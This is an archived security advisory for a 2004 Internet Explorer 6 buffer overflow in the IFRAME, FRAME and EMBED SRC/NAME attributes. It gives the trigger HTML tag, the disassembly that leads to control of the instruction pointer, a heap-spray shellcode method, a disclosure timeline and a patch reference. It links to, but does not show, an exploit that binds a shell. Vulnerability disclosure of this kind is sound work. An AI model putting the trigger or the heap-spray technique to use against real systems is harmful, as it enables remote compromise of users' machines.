Www.edup.tudelft.nl/~bjwever/advisory iframe.html.php
From Skypher
← Back to www.edup.tudelft.nl/~bjwever/This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that is very likely to be chuck-full of spelling errors.
Internet Explorer IFRAME src&name parameter BoF remote compromise
Contents |
Vulnerability
There is an exploitable BoF in the FRAME, EMBED and IFRAME tag using the SRC and NAME property. To trigger the BoF you only need this tag in a HTML file:
- <IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">
This will overwrite EAX with 0x00420042, after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX] 7178EC04 68 847B7071 PUSH SHDOCVW.71707B84 7178EC09 50 PUSH EAX 7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Control over EAX leads to control over ECX, which you can use to control EIP: Remote Command Execution.
Affected versions
The problem exists in Internet Explorer 6.0, on Win2K and WinXP (all service packs, except XP/SP2)
Exploit
exploits/InternetExploiter.zip contains InternetExploiter.html, the actual exploit. When you open this .html file in MSIE, it will try to exploit the vulnerability to bind a shell to port 28876.
The JavaScript creates a large amount of heap-blocks filled with 0x0D byte nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs. The BoF sets eax to 0x0D0D0D0D after which the above mentioned code gets executed, so we jump to 0x0D0D0D0D. We land inside one of the nopslide and slide on down to the shellcode.
The shellcode is encoded into a unicode string using my own Beta shellcode encoder.
Timeline
| 2004-10-24 | ned discovers bug in IE. |
| 2004-10-25 | Bug turns out to be Bof, advisory released. |
| 2004-11-02 | Exploit released. |
| 2004-12-01 | Patch released. |
Patch
Available from the Microsoft Corporation website.
Links
- exploits/InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.
- beta shellcode encoder: Documentation.
- src/beta.c C Source file for the current version of beta shellcode encoder.
- CERT: Microsoft Internet Explorer vulnerable to buffer overflow via FRAME, IFRAME, and EMBED elements.
- Secunia: Internet Explorer IFRAME Buffer Overflow Vulnerability.
- ZDNet news: Exploit code makes IE flaw more dangerous.
- Techworld: Microsoft stalls on vast Explorer exploit.
- Wall Street Journal: "Mydoom Worm Renews Debate On Cyber-Ethics" by David Bank.
- Microsoft Corporation website: Cumulative Security Update for Internet Explorer (889293)
